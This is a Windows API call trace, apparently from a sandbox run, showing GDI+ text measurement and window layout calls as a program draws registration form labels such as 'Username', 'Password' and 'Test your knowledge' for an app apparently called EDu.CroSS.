[0127.616] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipMeasureString (graphics=0x657fb88, string="Middle Name", length=11, font=0x657f430, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.616] GetLastError () returned 0x0
[0127.616] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.616] GetLastError () returned 0x0
[0127.616] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.616] GetCurrentThreadId () returned 0x600
[0127.616] GetCurrentThreadId () returned 0x600
[0127.616] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2787748) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.617] GdipMeasureString (graphics=0x657fb88, string="First Name", length=10, font=0x657f408, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.617] GetLastError () returned 0x0
[0127.618] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.618] GetLastError () returned 0x0
[0127.618] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.618] GetLastError () returned 0x0
[0127.618] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.618] GetCurrentThreadId () returned 0x600
[0127.618] GetCurrentThreadId () returned 0x600
[0127.618] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x27878a4) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.618] GetLastError () returned 0x0
[0127.618] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.619] GetLastError () returned 0x0
[0127.619] GdipMeasureString (graphics=0x657fb88, string="Username:-", length=10, font=0x657f3e0, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.619] GetLastError () returned 0x0
[0127.619] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.619] GetLastError () returned 0x0
[0127.619] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.619] GetLastError () returned 0x0
[0127.619] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.619] GetLastError () returned 0x0
[0127.619] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.619] GetLastError () returned 0x0
[0127.619] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.619] GetCurrentThreadId () returned 0x600
[0127.620] GetCurrentThreadId () returned 0x600
[0127.620] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2787a00) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] GdipMeasureString (graphics=0x657fb88, string="Mobile Number:-", length=15, font=0x657f3b8, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.620] GetLastError () returned 0x0
[0127.620] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.620] GetLastError () returned 0x0
[0127.620] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.620] GetLastError () returned 0x0
[0127.621] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.621] GetCurrentThreadId () returned 0x600
[0127.621] GetCurrentThreadId () returned 0x600
[0127.621] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2787b5c) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.621] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.621] GetLastError () returned 0x0
[0127.622] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.622] GetLastError () returned 0x0
[0127.622] GdipMeasureString (graphics=0x657fb88, string="Name:-", length=6, font=0x546efc0, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.622] GetLastError () returned 0x0
[0127.622] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.622] GetLastError () returned 0x0
[0127.622] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.622] GetLastError () returned 0x0
[0127.622] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.622] GetLastError () returned 0x0
[0127.622] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.622] GetLastError () returned 0x0
[0127.622] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.891] CreateCompatibleDC (hdc=0x0) returned 0x3d0109b1
[0127.891] GetLastError () returned 0x0
[0127.903] GetDC (hWnd=0x0) returned 0xa0100d0
[0127.903] GetLastError () returned 0x0
[0127.903] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dbac) returned 0x0
[0127.903] GetLastError () returned 0x0
[0127.919] GdipGetLogFontW (font=0x657af30, graphics=0x657fb18, logfontW=0x73db10) returned 0x0
[0127.921] GetLastError () returned 0x0
[0127.923] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.923] GetLastError () returned 0x7f
[0127.923] GdipDeleteGraphics (graphics=0x657fb18) returned 0x0
[0127.923] GetLastError () returned 0x7f
[0127.923] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0127.923] GetLastError () returned 0x7f
[0127.925] CreateFontIndirectW (lplf=0x73db10) returned 0x350a09a6
[0127.926] GetLastError () returned 0x7f
[0127.930] SelectObject (hdc=0x3d0109b1, h=0x350a09a6) returned 0x18a0048
[0127.930] GetLastError () returned 0x7f
[0127.949] GetTextMetricsW (in: hdc=0x3d0109b1, lptm=0x19dc88 | out: lptm=0x19dc88) returned 1
[0127.949] GetLastError () returned 0x7f
[0127.949] GetTextExtentPoint32W (in: hdc=0x3d0109b1, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x279e558 | out: psizl=0x279e558) returned 1
[0127.949] GetLastError () returned 0x7f
[0127.949] SelectObject (hdc=0x3d0109b1, h=0x18a0048) returned 0x350a09a6
[0127.949] GetLastError () returned 0x7f
[0127.957] DeleteDC (hdc=0x3d0109b1) returned 1
[0127.957] GetLastError () returned 0x7f
[0127.996] AdjustWindowRectEx (in: lpRect=0x19dab4, dwStyle=0x2ce0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19dab4) returned 1
[0127.996] AdjustWindowRectEx (in: lpRect=0x19dc24, dwStyle=0x2ce0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19dc24) returned 1
[0128.008] AdjustWindowRectEx (in: lpRect=0x19da24, dwStyle=0x2ce0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19da24) returned 1
[0128.008] AdjustWindowRectEx (in: lpRect=0x19daf8, dwStyle=0x2ce0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19daf8) returned 1
[0128.010] GetSystemMetrics (nIndex=34) returned 136
[0128.010] GetSystemMetrics (nIndex=35) returned 39
[0128.015] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.016] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.016] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e5ec) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipMeasureString (graphics=0x657fb88, string="All fields are mandatory", length=24, font=0x657f610, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.017] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.017] GetLastError () returned 0x7f
[0128.017] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.017] GetLastError () returned 0x7f
[0128.018] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.018] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.018] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.018] GetLastError () returned 0x7f
[0128.018] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e654) returned 0x0
[0128.018] GetLastError () returned 0x7f
[0128.018] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.018] GetLastError () returned 0x7f
[0128.018] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.018] GetLastError () returned 0x7f
[0128.018] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.018] GetLastError () returned 0x7f
[0128.018] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipMeasureString (graphics=0x657fb88, string="user", length=4, font=0x657f7a0, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.019] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.019] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e6bc) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.019] GetLastError () returned 0x7f
[0128.019] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipMeasureString (graphics=0x657fb88, string="Test your knowledge", length=19, font=0x657f728, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.020] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.020] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e724) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.020] GetLastError () returned 0x7f
[0128.020] GdipMeasureString (graphics=0x657fb88, string="EDu.CroSS", length=9, font=0x657f908, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.021] GetLastError () returned 0x7f
[0128.021] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.021] GetLastError () returned 0x7f
[0128.021] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.021] GetLastError () returned 0x7f
[0128.021] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.021] GetLastError () returned 0x7f
[0128.021] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.021] GetLastError () returned 0x7f
[0128.021] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.021] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.023] AdjustWindowRectEx (in: lpRect=0x19dbf8, dwStyle=0x56210242, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dbf8) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19daf8, dwStyle=0x56210242, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19daf8) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.028] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.028] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e80c) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipMeasureString (graphics=0x657fb88, string="Gender:-", length=8, font=0x657f890, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.029] GetLastError () returned 0x7f
[0128.029] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.029] GetLastError () returned 0x7f
[0128.029] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.030] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.030] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e874) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipMeasureString (graphics=0x657fb88, string="Age:-", length=5, font=0x657f7f0, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.030] GetLastError () returned 0x7f
[0128.030] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.030] GetLastError () returned 0x7f
[0128.030] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.030] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.030] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e8dc) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipMeasureString (graphics=0x657fb88, string="Confirm Password:-", length=18, font=0x657f868, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.031] GetLastError () returned 0x7f
[0128.031] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.031] GetLastError () returned 0x7f
[0128.031] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.031] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.032] GetSystemMetrics (nIndex=5) returned 1
[0128.032] GetSystemMetrics (nIndex=6) returned 1
[0128.032] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.032] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.032] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e964) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipMeasureString (graphics=0x657fb88, string="Password:-", length=10, font=0x657f8e0, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.032] GetLastError () returned 0x7f
[0128.032] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.032] GetLastError () returned 0x7f
[0128.032] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.033] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.033] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279e9cc) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.033] GetLastError () returned 0x7f
